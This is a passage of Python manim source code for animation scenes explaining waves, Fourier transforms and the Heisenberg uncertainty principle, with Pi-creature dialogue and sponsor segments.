BLUE, RED, (k-2)/2.0
)
func = lambda x : 0.5*np.cos(omega*t - k*x)
graph = FunctionGraph(
func,
x_min = -5*FRAME_X_RADIUS,
x_max = FRAME_X_RADIUS,
color = color,
)
return VGroup(graph, *[
Arrow(
x*RIGHT, x*RIGHT + func(x)*UP,
color = color
)
for x in np.arange(
-4*FRAME_X_RADIUS, FRAME_X_RADIUS,
self.arrow_spacing
)
])
wave = get_wave()
wave_update = Mobject.add_updater(
wave, lambda w : Transform(w, get_wave()).update(1)
)
rect = ScreenRectangle(height = 2)
rect.to_edge(RIGHT)
always_shift(rect, LEFT, 1)
rect_movement = rect
randy = self.pi_creature
randy_look_at = Mobject.add_updater(
randy, lambda r : r.look_at(rect)
)
ref_frame1 = TextMobject("Reference frame 1")
# ref_frame1.next_to(randy, UP, aligned_edge = LEFT)
ref_frame1.to_edge(UP)
ref_frame2 = TextMobject("Reference frame 2")
ref_frame2.next_to(rect, UP)
# ref_frame2.set_fill(opacity = 0)
ref_frame2_follow = Mobject.add_updater(
ref_frame2, lambda m : m.next_to(rect, UP)
)
ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)
self.add(
t_tracker, wave_update, rect_movement, randy_look_at,
ref_frame2_follow, ref_frame_1_continual_anim
)
self.add(ref_frame1)
self.play(randy.change, "pondering")
self.wait(4)
start_height = screen_rect.get_height()
start_center = screen_rect.get_center()
self.play(
UpdateFromAlphaFunc(
screen_rect,
lambda m, a : m.move_to(
interpolate(start_center, rect.get_center(), a)
)
),
k_tracker.shift, 2*RIGHT,
)
self.play(
MaintainPositionRelativeTo(
screen_rect, rect,
run_time = 4
),
)
self.play(
screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,
k_tracker.shift, 2*LEFT,
)
#Frequency words
temporal_frequency = TextMobject("Temporal", "frequency")
spatial_frequency = TextMobject("Spatial", "frequency")
temporal_frequency.move_to(screen_rect).to_edge(UP)
spatial_frequency.next_to(temporal_frequency, DOWN)
cross = Cross(temporal_frequency[0])
time = TextMobject("Time")
space = TextMobject("Space")
time.next_to(temporal_frequency, RIGHT, buff = 2)
space.next_to(time, DOWN)
space.align_to(spatial_frequency)
self.play(FadeIn(temporal_frequency))
self.play(ShowCreation(cross))
self.play(Write(spatial_frequency))
self.wait()
self.play(FadeIn(time), FadeIn(space))
self.play(
Transform(time, space),
Transform(space, time),
lag_ratio = 0.5,
run_time = 1,
)
self.play(FadeOut(time), FadeOut(space))
self.wait(3)
###
def create_pi_creature(self):
return Randolph().scale(0.5).to_corner(DOWN+LEFT)
class HangingWeightsScene(MovingCameraScene):
CONFIG = {
"frequency" : 0.5,
"ceiling_radius" : 3*FRAME_X_RADIUS,
"n_springs" : 72,
"amplitude" : 0.6,
"spring_radius" : 0.15,
}
def construct(self):
self.setup_springs()
self.setup_weights()
self.introduce()
self.show_analogy_with_electron()
self.metaphor_for_something()
self.moving_reference_frame()
def setup_springs(self):
ceiling = self.ceiling = Line(LEFT, RIGHT)
ceiling.scale(self.ceiling_radius)
ceiling.to_edge(UP, buff = LARGE_BUFF)
self.add(ceiling)
def get_spring(alpha, height = 2):
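# Draw a coil spring as a parametric curve: circular motion in the plane plus a
# quadratically decaying vertical drop, scaled to span the requested height and
# hung from the point a fraction alpha of the way along the ceiling.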
t_max = 6.5
r = self.spring_radius
s = (height - r)/(t_max**2)
spring = ParametricFunction(
lambda t : op.add(
r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),
s*((t_max - t)**2)*DOWN,
),
t_min = 0, t_max = t_max,
color = WHITE,
stroke_width = 2,
)
spring.alpha = alpha
spring.move_to(ceiling.point_from_proportion(alpha), UP)
spring.color_using_background_image("grey_gradient")
return spring
alphas = np.linspace(0, 1, self.n_springs)
bezier([0, 1, 0, 1])
springs = self.springs = VGroup(*list(map(get_spring, alphas)))
k_tracker = self.k_tracker = VectorizedPoint()
t_tracker = self.t_tracker = VectorizedPoint()
always_shift(t_tracker, RIGHT, 1)
self.t_tracker_walk = t_tracker
equilibrium_height = springs.get_height()
def update_springs(springs):
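# Each spring's length is modulated by a traveling wave A*cos(TAU*f*t - k*x):
# t comes from t_tracker, x is the spring's horizontal position, and k from
# k_tracker sets the spatial frequency, so shifting k_tracker changes the wavelength.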
for spring in springs:
k = k_tracker.get_center()[0]
t = t_tracker.get_center()[0]
f = self.frequency
x = spring.get_top()[0]
A = self.amplitude
d_height = A*np.cos(TAU*f*t - k*x)
new_spring = get_spring(spring.alpha, 2+d_height)
Transform(spring, new_spring).update(1)
spring_update_anim = Mobject.add_updater(springs, update_springs)
self.spring_update_anim = spring_update_anim
spring_update_anim.update(0)
self.play(
ShowCreation(ceiling),
LaggedStartMap(ShowCreation, springs)
)
def setup_weights(self):
weights = self.weights = VGroup()
weight_anims = []
for spring in self.springs:
x = spring.get_top()[0]
mass = np.exp(-0.1*x**2)
weight = Circle(radius = 0.15)
weight.start_radius = 0.15
weight.target_radius = 0.25*mass #For future update
weight.spring = spring
weight_anim = Mobject.add_updater(
weight, lambda w : w.move_to(w.spring.get_bottom())
)
weight_anim.update(0)
weight_anims.append(weight_anim)
weights.add(weight)
weights.set_fill(opacity = 1)
weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)
weights.set_stroke(WHITE, 1)
self.play(LaggedStartMap(GrowFromCenter, weights))
self.add(self.t_tracker_walk)
self.add(self.spring_update_anim)
self.add(*weight_anims)
def introduce(self):
arrow = Arrow(4*LEFT, LEFT)
arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))
arrows.set_color(WHITE)
self.wait(3)
self.play(*list(map(GrowArrow, arrows)))
self.play(*[
UpdateFromAlphaFunc(
weight, lambda w, a : w.set_width(
2*interpolate(w.start_radius, w.target_radius, a)
),
run_time = 2
)
for weight in self.weights
])
self.play(FadeOut(arrows))
self.wait(3)
def show_analogy_with_electron(self):
words = TextMobject(
"Analogous to the energy of a particle \\\\",
"(in the sense of $E=mc^2$)"
)
words.move_to(DOWN)
self.play(Write(words))
self.wait(3)
self.play(FadeOut(words))
def metaphor_for_something(self):
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(3.5)
de_broglie.to_corner(DOWN+RIGHT)
words = TextMobject("""
If a photon's energy is carried as a wave \\\\
is this true for any particle?
""")
words.next_to(de_broglie, LEFT)
einstein = ImageMobject("Einstein")
einstein.match_height(de_broglie)
einstein.to_corner(DOWN+LEFT)
for picture in de_broglie, einstein:
picture.backdrop = Rectangle()
picture.backdrop.replace(picture, stretch = True)
picture.backdrop.set_fill(BLACK, 1)
picture.backdrop.set_stroke(BLACK, 0)
self.play(
Animation(de_broglie.backdrop, remover = True),
FadeIn(de_broglie)
)
self.play(Write(words))
self.wait(7)
self.play(
FadeOut(words),
Animation(einstein.backdrop, remover = True),
FadeIn(einstein)
)
self.wait(2)
self.de_broglie = de_broglie
self.einstein = einstein
def moving_reference_frame(self):
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect_movement = always_shift(rect, direction = LEFT, rate = 2)
camera_frame = self.camera_frame
self.add(rect)
self.play(
Animation(self.de_broglie.backdrop, remover = True),
FadeOut(self.de_broglie),
Animation(self.einstein.backdrop, remover = True),
FadeOut(self.einstein),
)
self.play(camera_frame.scale, 3, {"about_point" : 2*UP})
self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)
self.add(rect_movement)
self.wait(3)
def zoom_into_reference_frame():
original_height = camera_frame.get_height()
original_center = camera_frame.get_center()
self.play(
UpdateFromAlphaFunc(
camera_frame, lambda c, a : c.set_height(
interpolate(original_height, 0.95*rect.get_height(), a)
).move_to(
interpolate(original_center, rect.get_center(), a)
)
),
ApplyMethod(self.k_tracker.shift, RIGHT)
)
self.play(MaintainPositionRelativeTo(
camera_frame, rect,
run_time = 6
))
self.play(
camera_frame.set_height, original_height,
camera_frame.move_to, original_center,
ApplyMethod(self.k_tracker.shift, LEFT)
)
zoom_into_reference_frame()
self.wait()
self.play(
UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))
)
index = int(0.5*len(self.springs))
weights = VGroup(self.weights[index], self.weights[index+4])
flashes = list(map(self.get_peak_flash_anim, weights))
weights.save_state()
weights.set_fill(RED)
self.add(*flashes)
self.wait(5)
rect.align_to(camera_frame, RIGHT)
self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))
randy = Randolph(mode = "pondering")
randy.look(UP+RIGHT)
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(6)
de_broglie.next_to(4*DOWN, DOWN)
self.add(
Mobject.add_updater(
randy, lambda m : m.next_to(
rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,
).look_at(weights)
),
de_broglie
)
self.wait(2)
zoom_into_reference_frame()
self.wait(8)
###
def get_peak_flash_anim(self, weight):
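# Dummy mobject whose updater watches the weight's vertical motion and fires a
# brief Flash each time the vertical velocity changes sign (a peak or trough),
# throttled to at most one flash every 0.5 seconds.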
mobject = Mobject() #Dummy
mobject.last_y = 0
mobject.last_dy = 0
mobject.curr_anim = None
mobject.curr_anim_time = 0
mobject.time_since_last_flash = 0
def update(mob, dt):
mob.time_since_last_flash += dt
point = weight.get_center()
y = point[1]
mob.dy = y - mob.last_y
different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)
if different_dy and mob.time_since_last_flash > 0.5:
mob.curr_anim = Flash(
VectorizedPoint(point),
flash_radius = 0.5,
line_length = 0.3,
run_time = 0.2,
)
mob.submobjects = [mob.curr_anim.mobject]
mob.time_since_last_flash = 0
mob.last_y = float(y)
mob.last_dy = float(mob.dy)
##
if mob.curr_anim:
mob.curr_anim_time += dt
if mob.curr_anim_time > mob.curr_anim.run_time:
mob.curr_anim = None
mob.submobjects = []
mob.curr_anim_time = 0
return
mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)
return Mobject.add_updater(mobject, update)
class MinutPhysicsWrapper(Scene):
def construct(self):
logo = ImageMobject("minute_physics_logo", invert = True)
logo.to_corner(UP+LEFT)
self.add(logo)
title = TextMobject("Minute Physics on special relativity")
title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)
screen_rect = ScreenRectangle()
screen_rect.set_width(title.get_width() + LARGE_BUFF)
screen_rect.next_to(title, DOWN)
self.play(ShowCreation(screen_rect))
self.play(Write(title))
self.wait(2)
class WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"So! What does \\\\ the Fourier trade-off \\\\ tell us?",
target_mode = "surprised",
bubble_kwargs = {"width" : 4, "height" : 3}
)
self.change_student_modes(*["thinking"]*3)
self.wait(4)
class FourierTransformOfWaveFunction(Scene):
CONFIG = {
"wave_stroke_width" : 3,
"wave_color" : BLUE,
}
def construct(self):
self.show_wave_packet()
self.take_fourier_transform()
self.show_correlations_with_pure_frequencies()
self.this_is_momentum()
self.show_tradeoff()
def setup(self):
self.x0_tracker = ValueTracker(-3)
self.k_tracker = ValueTracker(1)
self.a_tracker = ExponentialValueTracker(0.5)
def show_wave_packet(self):
axes = Axes(
x_min = 0, x_max = 12,
y_min = -1, y_max = 1,
y_axis_config = {
"tick_frequency" : 0.5
}
)
position_label = TextMobject("Position")
position_label.next_to(axes.x_axis.get_right(), UP)
axes.add(position_label)
axes.center().to_edge(UP, buff = LARGE_BUFF)
wave = self.get_wave(axes)
wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.add(axes, wave)
self.play(
self.x0_tracker.set_value, 5,
wave_update_animation,
run_time = 3,
)
self.wait()
self.wave_function = wave.underlying_function
self.wave_update_animation = wave_update_animation
self.wave = wave
self.axes = axes
def take_fourier_transform(self):
wave = self.wave
wave_update_animation = self.wave_update_animation
frequency_axes = Axes(
x_min = 0, x_max = 3,
x_axis_config = {
"unit_size" : 4,
"tick_frequency" : 0.25,
"numbers_with_elongated_ticks" : [1, 2]
},
y_min = -0.15,
y_max = 0.15,
y_axis_config = {
"unit_size" : 7.5,
"tick_frequency" : 0.05,
}
)
label = self.frequency_x_axis_label = TextMobject("Spatial frequency")
label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(label)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
label.shift_onto_screen()
def get_wave_function_fourier_graph():
return get_fourier_graph(
frequency_axes, self.get_wave_func(),
t_min = 0, t_max = 15,
)
fourier_graph = get_wave_function_fourier_graph()
self.fourier_graph_update_animation = UpdateFromFunc(
fourier_graph, lambda m : Transform(
m, get_wave_function_fourier_graph()
).update(1)
)
wave_copy = wave.copy()
wave_copy.generate_target()
wave_copy.target.move_to(fourier_graph, LEFT)
wave_copy.target.fade(1)
fourier_graph.save_state()
fourier_graph.move_to(wave, LEFT)
fourier_graph.fade(1)
arrow = Arrow(
self.axes.coords_to_point(5, -1),
frequency_axes.coords_to_point(1, 0.1),
color = YELLOW,
)
fourier_label = TextMobject("Fourier Transform")
fourier_label.next_to(arrow.get_center(), RIGHT)
self.play(ReplacementTransform(
self.axes.copy(), frequency_axes
))
self.play(
MoveToTarget(wave_copy, remover = True),
fourier_graph.restore,
GrowArrow(arrow),
Write(fourier_label, run_time = 1),
)
self.wait()
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
self.fourier_label = VGroup(arrow, fourier_label)
def show_correlations_with_pure_frequencies(self):
frequency_axes = self.frequency_axes
axes = self.axes
sinusoid = axes.get_graph(
lambda x : 0.5*np.cos(TAU*x),
x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,
)
sinusoid.to_edge(UP, buff = SMALL_BUFF)
v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)
f_equals = TexMobject("f = ")
freq_decimal = DecimalNumber(1)
freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)
freq_label = VGroup(f_equals, freq_decimal)
freq_label.next_to(
v_line, UP, SMALL_BUFF,
submobject_to_align = f_equals[0]
)
self.play(
ShowCreation(sinusoid),
ShowCreation(v_line),
Write(freq_label, run_time = 1),
FadeOut(self.fourier_label)
)
last_f = 1
for f in 1.4, 0.7, 1:
self.play(
sinusoid.stretch,f/last_f, 0,
{"about_point" : axes.coords_to_point(0, 0)},
v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,
MaintainPositionRelativeTo(freq_label, v_line),
ChangeDecimalToValue(freq_decimal, f),
run_time = 3,
)
last_f = f
self.play(*list(map(FadeOut, [
sinusoid, v_line, freq_label
])))
def this_is_momentum(self):
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"xi" : YELLOW,
})
formula.next_to(
self.frequency_x_axis_label, UP
)
f_max = 0.12
brace = Brace(Line(2*LEFT, 2*RIGHT), UP)
brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)
words = TextMobject("This wave \\\\ describes momentum")
words.next_to(brace, UP)
self.play(Write(formula))
self.wait()
self.play(
GrowFromCenter(brace),
Write(words)
)
brace.add(words)
for k in 2, 0.5, 1:
self.play(
self.k_tracker.set_value, k,
self.wave_update_animation,
self.fourier_graph_update_animation,
UpdateFromFunc(
brace, lambda b : b.move_to(
self.frequency_axes.coords_to_point(
self.k_tracker.get_value(),
f_max,
),
DOWN
)
),
run_time = 2
)
self.wait()
self.play(*list(map(FadeOut, [brace, words, formula])))
def show_tradeoff(self):
for a in 5, 0.1, 0.01, 10, 0.5:
self.play(
ApplyMethod(
self.a_tracker.set_value, a,
run_time = 2
),
self.wave_update_animation,
self.fourier_graph_update_animation
)
self.wait()
##
def get_wave_func(self):
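# Gaussian wave packet A*cos(TAU*k*x)*exp(-a*(x-x0)^2): the amplitude A = a^(1/4)
# keeps the packet roughly normalized, k sets the spatial frequency, and a controls
# concentration -- sharp in position means spread out in spatial frequency, and vice versa.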
x0 = self.x0_tracker.get_value()
k = self.k_tracker.get_value()
a = self.a_tracker.get_value()
A = a**(0.25)
return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)
def get_wave(self, axes):
return axes.get_graph(
self.get_wave_func(),
color = self.wave_color,
stroke_width = self.wave_stroke_width
)
class DopplerComparisonTodos(TODOStub):
CONFIG = {
"message" : """
Insert some Doppler footage,
insert some hanging spring scene,
insert position-momentum Fourier trade-off
"""
}
class MusicalNote(AddingPureFrequencies):
def construct(self):
speaker = self.speaker = SVGMobject(file_name = "speaker")
speaker.move_to(2*DOWN)
randy = self.pi_creature
axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5
)
axes.center().to_edge(UP)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
graph = axes.get_graph(
lambda x : op.mul(
np.exp(-0.2*(x-4)**2),
0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),
),
)
graph.set_color(BLUE)
v_line = DashedLine(ORIGIN, 0.5*UP)
v_line_update = UpdateFromFunc(
v_line, lambda l : l.put_start_and_end_on_with_projection(
graph.points[-1],
axes.x_axis.number_to_point(
axes.x_axis.point_to_number(graph.points[-1])
)
)
)
self.add(speaker, axes)
self.play(
randy.change, "pondering",
self.get_broadcast_animation(n_circles = 6, run_time = 5),
self.get_broadcast_animation(n_circles = 12, run_time = 5),
ShowCreation(graph, run_time = 5, rate_func=linear),
v_line_update
)
self.wait(2)
class AskAboutUncertainty(TeacherStudentsScene):
def construct(self):
self.student_says(
"What does this have \\\\ to do with ``certainty''",
bubble_kwargs = {"direction" : LEFT},
student_index = 2
)
self.play(PiCreatureSays(
self.students[0],
"What even are \\\\ these waves?",
target_mode = "confused"
))
self.wait(2)
class ProbabalisticDetection(FourierTransformOfWaveFunction):
CONFIG = {
"wave_stroke_width" : 2,
}
def construct(self):
self.setup_wave()
self.detect_only_single_points()
self.show_probability_distribution()
self.show_concentration_of_the_wave()
def setup_wave(self):
axes = Axes(
x_min = 0, x_max = 10,
y_min = -0.5, y_max = 1.5,
y_axis_config = {
"unit_size" : 1.5,
"tick_frequency" : 0.25,
}
)
axes.set_stroke(width = 2)
axes.center()
self.x0_tracker.set_value(5)
self.k_tracker.set_value(1)
self.a_tracker.set_value(0.2)
wave = self.get_wave(axes)
self.wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.k_tracker.save_state()
self.k_tracker.set_value(0)
bell_curve = self.get_wave(axes)
self.k_tracker.restore()
bell_curve.set_stroke(width = 0)
bell_curve.set_fill(BLUE, opacity = 0.5)
squared_bell_curve = axes.get_graph(
lambda x : bell_curve.underlying_function(x)**2
).match_style(bell_curve)
self.set_variables_as_attrs(
axes, wave, bell_curve, squared_bell_curve
)
def detect_only_single_points(self):
particle = ProbabalisticDotCloud(
n_copies = 100,
fill_opacity = 0.05,
time_per_change = 0.05,
)
particle.mobject[0].set_fill(BLUE, opacity = 1)
gdw = particle.gaussian_distribution_wrapper
rect = Rectangle(
stroke_width = 0,
height = 0.5,
width = 2,
)
rect.set_fill(YELLOW, 0.3)
rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))
brace = Brace(rect, UP, buff = 0)
question = TextMobject("Do we detect the particle \\\\ in this region?")
question.next_to(brace, UP)
question.add_background_rectangle()
rect.save_state()
rect.stretch(0, 0)
gdw_anim = Mobject.add_updater(
gdw, lambda m : m.set_width(
2.0/(self.a_tracker.get_value()**(0.5))
).move_to(rect)
)
self.add(rect, brace, question)
yes = TextMobject("Yes").set_color(GREEN)
no = TextMobject("No").set_color(RED)
for word in yes, no:
word.next_to(rect, DOWN)
# word.add_background_rectangle()
answer = VGroup()
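# Swap the displayed answer between "Yes" and "No" depending on whether the
# sampled dot's x-coordinate currently falls inside the detection rectangle.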
def update_answer(answer):
px = particle.mobject[0].get_center()[0]
lx = rect.get_left()[0]
rx = rect.get_right()[0]
if lx < px < rx:
answer.submobjects = [yes]
else:
answer.submobjects = [no]
answer_anim = Mobject.add_updater(answer, update_answer)
self.add(gdw_anim, particle)
self.play(
GrowFromCenter(brace),
rect.restore,
Write(question)
)
self.wait()
self.add(answer_anim)
self.wait(4)
self.add_foreground_mobjects(answer, particle.mobject)
self.question_group = VGroup(question, brace)
self.particle = particle
self.rect = rect
def show_probability_distribution(self):
axes = self.axes
wave = self.wave
bell_curve = self.bell_curve
question_group = self.question_group
gdw = self.particle.gaussian_distribution_wrapper
rect = self.rect
v_lines = VGroup(*[
DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)
for point in (rect.get_left(), rect.get_right())
])
self.play(
FadeIn(VGroup(axes, wave)),
question_group.next_to, v_lines, UP, {"buff" : 0},
*list(map(ShowCreation, v_lines))
)
self.wait(10)
def show_concentration_of_the_wave(self):
self.play(
self.a_tracker.set_value, 5,
self.wave_update_animation,
)
self.wait(10)
class HeisenbergCommentTodos(TODOStub):
CONFIG = {
"message" : "Insert position-momentum trade-off"
}
class HeisenbergPetPeeve(PiCreatureScene):
def construct(self):
morty, other = self.pi_creatures
particle = ProbabalisticDotCloud()
gdw = particle.gaussian_distribution_wrapper
gdw.to_edge(UP, buff = LARGE_BUFF)
gdw.stretch_to_fit_width(3)
gdw.rotate(3*DEGREES)
self.add(particle)
self.wait()
self.play(PiCreatureSays(
other, """
According to the H.U.P., the \\\\
universe is unknowable!
""",
target_mode = "speaking"
))
self.play(morty.change, "angry")
self.wait(3)
self.play(
PiCreatureSays(
morty, "Well, yes and no",
target_mode = "sassy",
),
RemovePiCreatureBubble(
other, target_mode = "erm"
)
)
self.wait(4)
###
def create_pi_creatures(self):
morty = Mortimer()
morty.to_corner(DOWN+RIGHT)
other = PiCreature(color = MAROON_E)
other.to_edge(DOWN).shift(3*LEFT)
return VGroup(morty, other)
class OneLevelDeeper(Scene):
def construct(self):
heisenberg = ImageMobject("Heisenberg")
heisenberg.to_corner(UP+LEFT)
self.add(heisenberg)
hup_words = TextMobject("Heisenberg's uncertainty principle")
wave_words = TextMobject("Interpretation of the wave function")
arrow = Vector(UP)
group = VGroup(hup_words, arrow, wave_words)
group.arrange(DOWN)
randomness = ProbabalisticMobjectCloud(
TextMobject("Randomness"),
n_copies = 5,
time_per_change = 0.05
)
gdw = randomness.gaussian_distribution_wrapper
gdw.rotate(TAU/4)
gdw.set_height(1)
# gdw.set_width(4)
gdw.next_to(hup_words, UP, MED_LARGE_BUFF)
self.add(hup_words, randomness)
self.wait(4)
self.play(
FadeIn(wave_words),
GrowArrow(arrow),
ApplyMethod(
gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,
path_arc = TAU/2,
)
)
self.wait(6)
class BetterTranslation(TeacherStudentsScene):
def construct(self):
english_term = TextMobject("Uncertainty principle")
german_word = TextMobject("Unschärferelation")
translation = TextMobject("Unsharpness relation")
to_german_words = TextMobject("In German")
to_german_words.scale(0.5)
to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)
to_german_words.set_color(YELLOW)
to_german_group = VGroup(to_german_arrow, to_german_words)
translation_words = TextMobject("Literal translation")
translation_words.scale(0.5)
translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)
translation_words.set_color(YELLOW)
translation_group = VGroup(translation_arrow, translation_words)
english_term.next_to(self.teacher, UP+LEFT)
english_term.save_state()
english_term.shift(DOWN)
english_term.fade(1)
self.play(
english_term.restore,
self.get_student_changes(*["pondering"]*3)
)
self.wait()
german_word.move_to(english_term)
to_german_group.next_to(
german_word, UP,
submobject_to_align = to_german_arrow
)
self.play(
self.teacher.change, "raise_right_hand",
english_term.next_to, to_german_arrow, UP
)
self.play(
GrowArrow(to_german_arrow),
FadeIn(to_german_words),
ReplacementTransform(
english_term.copy().fade(1),
german_word
)
)
self.wait(2)
group = VGroup(english_term, to_german_group, german_word)
translation.move_to(german_word)
translation_group.next_to(
german_word, UP,
submobject_to_align = translation_arrow
)
self.play(
group.next_to, translation_arrow, UP,
)
self.play(
GrowArrow(translation_arrow),
FadeIn(translation_words),
ReplacementTransform(
german_word.copy().fade(1),
translation
)
)
self.change_student_modes(*["happy"]*3)
self.wait(2)
class ThinkOfHeisenbergUncertainty(PiCreatureScene):
def construct(self):
morty = self.pi_creature
morty.center().to_edge(DOWN).shift(LEFT)
dot_cloud = ProbabalisticDotCloud()
dot_gdw = dot_cloud.gaussian_distribution_wrapper
dot_gdw.set_width(1)
dot_gdw.rotate(TAU/8)
dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2)
vector_cloud = ProbabalisticVectorCloud(
center_func = dot_gdw.get_center
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.set_width(0.1)
vector_gdw.rotate(TAU/8)
vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)
time_tracker = ValueTracker(0)
self.add()
freq = 1
continual_anims = [
always_shift(time_tracker, direction = RIGHT, rate = 1),
Mobject.add_updater(
dot_gdw,
lambda d : d.set_width(
(np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
Mobject.add_updater(
vector_gdw,
lambda d : d.set_width(
(-np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
dot_cloud, vector_cloud
]
self.add(*continual_anims)
position, momentum, time, frequency = list(map(TextMobject, [
"Position", "Momentum", "Time", "Frequency"
]))
VGroup(position, time).set_color(BLUE)
VGroup(momentum, frequency).set_color(YELLOW)
groups = VGroup()
for m1, m2 in (position, momentum), (time, frequency):
arrow = TexMobject("\\updownarrow").scale(1.5)
group = VGroup(m1, arrow, m2)
group.arrange(DOWN)
lp, rp = parens = TexMobject("\\big(\\big)")
parens.stretch(1.5, 1)
parens.match_height(group)
lp.next_to(group, LEFT, buff = SMALL_BUFF)
rp.next_to(group, RIGHT, buff = SMALL_BUFF)
group.add(parens)
groups.add(group)
arrow = TexMobject("\\Leftrightarrow").scale(2)
groups.submobjects.insert(1, arrow)
groups.arrange(RIGHT)
groups.next_to(morty, UP+RIGHT, LARGE_BUFF)
groups.shift_onto_screen()
self.play(PiCreatureBubbleIntroduction(
morty, "Heisenberg \\\\ uncertainty \\\\ principle",
bubble_class = ThoughtBubble,
bubble_kwargs = {"height" : 4, "width" : 4, "direction" : RIGHT},
target_mode = "pondering"
))
self.wait()
self.play(morty.change, "confused", dot_gdw)
self.wait(10)
self.play(
ApplyMethod(
VGroup(dot_gdw, vector_gdw ).shift,
FRAME_X_RADIUS*RIGHT,
rate_func = running_start
)
)
self.remove(*continual_anims)
self.play(
morty.change, "raise_left_hand", groups,
FadeIn(
groups,
lag_ratio = 0.5,
run_time = 3,
)
)
self.wait(2)
# End things
class PatreonMention(PatreonThanks):
def construct(self):
morty = Mortimer()
morty.next_to(ORIGIN, DOWN)
patreon_logo = PatreonLogo()
patreon_logo.to_edge(UP)
thank_you = TextMobject("Thank you.")
thank_you.next_to(patreon_logo, DOWN)
self.play(
DrawBorderThenFill(patreon_logo),
morty.change, "gracious"
)
self.play(Write(thank_you))
self.wait(3)
class Promotion(PiCreatureScene):
CONFIG = {
"camera_class" : ThreeDCamera,
"seconds_to_blink" : 5,
}
def construct(self):
aops_logo = AoPSLogo()
aops_logo.next_to(self.pi_creature, UP+LEFT)
url = TextMobject(
"AoPS.com/", "3b1b",
arg_separator = ""
)
url.to_corner(UP+LEFT)
url_rect = Rectangle(color = BLUE)
url_rect.replace(
url.get_part_by_tex("3b1b"),
stretch = True
)
url_rect.stretch_in_place(1.1, dim = 1)
rect = Rectangle(height = 9, width = 16)
rect.set_height(4.5)
rect.next_to(url, DOWN)
rect.to_edge(LEFT)
rect.set_stroke(width = 0)
mathy = Mathematician()
mathy.flip()
mathy.to_corner(DOWN+RIGHT)
morty = self.pi_creature
morty.save_state()
book = ImageMobject("AoPS_volume_2")
book.set_height(2)
book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)
mathy.get_center = mathy.get_top
words = TextMobject("""
Interested in working for \\\\
one of my favorite math\\\\
education companies?
""", alignment = "")
words.to_edge(UP)
arrow = Arrow(
aops_logo.get_top(),
morty.get_top(),
path_arc = -0.4*TAU,
stroke_width = 5,
tip_length = 0.5,
)
arrow.tip.shift(SMALL_BUFF*DOWN)
self.add(words)
self.play(
self.pi_creature.change_mode, "raise_right_hand",
*[
DrawBorderThenFill(
submob,
run_time = 2,
rate_func = squish_rate_func(double_smooth, a, a+0.5)
)
for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))
]
)
self.play(
words.scale, 0.75,
words.next_to, url, DOWN, LARGE_BUFF,
words.shift_onto_screen,
Write(url),
)
self.wait(2)
self.play(
LaggedStartMap(
ApplyFunction, aops_logo,
lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),
rate_func = there_and_back,
run_time = 1,
),
morty.change, "thinking"
)
self.wait()
self.play(ShowCreation(arrow))
self.play(FadeOut(arrow))
self.wait()
# To teacher
self.play(
morty.change_mode, "plain",
morty.flip,
morty.scale, 0.7,
morty.next_to, mathy, LEFT, LARGE_BUFF,
morty.to_edge, DOWN,
FadeIn(mathy),
)
self.play(
PiCreatureSays(
mathy, "",
bubble_kwargs = {"width" : 5},
look_at_arg = morty.eyes,
),
morty.change, "happy",
aops_logo.shift, 1.5*UP + 0.5*RIGHT
)
self.play(Blink(mathy))
self.wait()
self.play(
RemovePiCreatureBubble(
mathy, target_mode = "raise_right_hand"
),
aops_logo.to_corner, UP+RIGHT,
aops_logo.shift, MED_SMALL_BUFF*DOWN,
